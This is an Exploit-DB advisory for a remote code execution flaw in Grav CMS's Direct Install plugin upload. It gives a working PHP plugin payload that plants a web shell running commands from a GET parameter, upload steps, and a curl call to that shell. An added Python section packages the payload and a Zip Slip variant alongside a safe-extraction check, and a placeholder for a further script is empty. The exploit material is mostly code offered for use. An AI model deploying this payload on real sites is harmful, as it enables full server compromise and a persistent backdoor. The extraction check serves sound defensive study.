Grav CMS 2.0.0-beta.2 - Remote Code Execution

26 May 2026 | Reported by Mustafa Murat Akgül | Type: exploitdb | Source: www.exploit-db.com

Grav CMS before 2.0.0-beta.2 allows remote code execution via Direct Install ZIP path traversal.

Code
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE) 
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)

Technical Details:
The "Direct Install" tool of the Grav Admin plugin lets an administrator upload a 
plugin or theme as a ZIP archive, which Grav then extracts into the installation. 
Before 2.0.0-beta.2 the archive contents were not adequately validated and entry 
names were not checked for path traversal (Zip Slip) during extraction, so an entry 
whose name contains ".." components is written outside the intended plugin directory. 
Independently of the traversal, a plugin installed this way has its PHP loaded on the 
next request: a plugin that hooks a Grav event (e.g. onPluginsInitialized) therefore 
runs arbitrary PHP as the web server user and can drop a persistent web shell in the 
web root. The PoC below relies on that event hook and does not need a traversing 
entry name.

Proof of Concept (PoC):

1. Create a malicious plugin structure:
   - shellplugin/blueprints.yaml
   - shellplugin/shellplugin.yaml
   - shellplugin/shellplugin.php (Payload below)

--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;

// Class name follows Grav's convention: plugin "shellplugin" -> ShellpluginPlugin.
class ShellpluginPlugin extends Plugin {
    public static function getSubscribedEvents(): array {
        // Fires once plugins are initialised, i.e. on every request.
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }
    public function onPluginsInitialized(): void {
        // GRAV_ROOT is the Grav install directory, normally the document root.
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
----------------------

2. Compress the directory:
   $ zip -r shellplugin.zip shellplugin/

3. Log in to the Grav Admin panel and navigate to:
   /admin/tools/direct-install

4. Upload the 'shellplugin.zip' file.

5. Once installed, the plugin's onPluginsInitialized handler runs on the next 
   request to the site and writes shell.php into GRAV_ROOT (the web root).

6. Access your shell:
   curl "http://<target>/shell.php?cmd=id"
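The following is an added example, not code from the advisory or from the Grav project. It packages the PoC plugin from the steps above as a ZIP in Python (the same layout `zip -r` produces, minus directory entries), builds the Zip Slip variant that the Technical Details describe by adding an entry whose name climbs out of the plugin directory, and runs both archives through the entry-name check a hardened extractor has to perform before writing anything. The manifest fields, the scratch plugin directory and the traversing entry name are assumptions made for the example.

```python
import io
import os
import shutil
import tempfile
import zipfile

PLUGIN_NAME = "shellplugin"

# Payload from the PoC above, unchanged.
PLUGIN_PHP = r"""<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;

class ShellpluginPlugin extends Plugin {
    public static function getSubscribedEvents(): array {
        return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
    }
    public function onPluginsInitialized(): void {
        $shell_path = GRAV_ROOT . '/shell.php';
        if (!file_exists($shell_path)) {
            file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
        }
    }
}
"""
# Minimal manifests; the exact fields Grav expects are an assumption here.
BLUEPRINTS_YAML = "name: Shellplugin\nversion: 1.0.0\ntype: plugin\ndescription: test\n"
PLUGIN_YAML = "enabled: true\n"
WEBSHELL = '<?php system($_GET["cmd"]); ?>'


def build_plugin_zip(traversal_entry: bool = False) -> bytes:
    """Return the PoC plugin as ZIP bytes. With traversal_entry=True an extra
    entry with '..' components is added (the Zip Slip variant); zipfile.writestr
    stores the name verbatim, so the traversal survives into the archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{PLUGIN_NAME}/blueprints.yaml", BLUEPRINTS_YAML)
        zf.writestr(f"{PLUGIN_NAME}/{PLUGIN_NAME}.yaml", PLUGIN_YAML)
        zf.writestr(f"{PLUGIN_NAME}/{PLUGIN_NAME}.php", PLUGIN_PHP)
        if traversal_entry:
            # user/plugins/shellplugin/../../../shell.php -> <GRAV_ROOT>/shell.php
            zf.writestr(f"{PLUGIN_NAME}/../../../shell.php", WEBSHELL)
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    """Names of entries that would land outside dest. Each name is joined to the
    destination and normalised, then required to still sit under it; this catches
    '..' components, absolute names and drive-letter names alike."""
    dest_real = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(info.filename)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Validate every entry name first and refuse the whole archive if any
    escapes; only then write files. Returns the paths written."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"refusing archive, entries escape {dest}: {bad}")
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            os.makedirs(target if info.is_dir() else os.path.dirname(target), exist_ok=True)
            if info.is_dir():
                continue
            with zf.open(info) as src, open(target, "wb") as out:
                shutil.copyfileobj(src, out)
            written.append(target)
    return written


def demo() -> dict:
    """Extract the clean PoC archive into a scratch plugin directory, then show
    the Zip Slip variant being refused before a single file is written."""
    scratch = os.path.realpath(tempfile.mkdtemp(prefix="grav-plugins-"))
    try:
        clean = safe_extract(build_plugin_zip(), scratch)
        slip = build_plugin_zip(traversal_entry=True)
        refused = False
        try:
            safe_extract(slip, scratch)
        except ValueError:
            refused = True
        return {
            "plugin_files": [os.path.relpath(p, scratch).replace(os.sep, "/") for p in clean],
            "slip_entries": unsafe_entries(slip, scratch),
            "slip_refused": refused,
        }
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The check resolves each name against the destination and compares the common prefix rather than looking for a literal "../" substring, so absolute names and names that only normalise to a traversal are caught too. A production extractor additionally has to handle symlink entries and hard links, which can escape the directory after extraction even when every name passes this test.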

Exploit Script (Python):
[Placeholder left in the original, translated from Turkish: "You can add the Python script you shared above here." No script follows.]

Impact:
Arbitrary code execution as the web server user, which on a typical deployment 
means full compromise of the Grav installation and a foothold on the host. The 
prerequisite is an authenticated administrator uploading the archive, or an 
attacker getting an administrator to submit it (CSRF).


Scores (as of 26 May 2026):
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 9.1
EPSS: 0.03934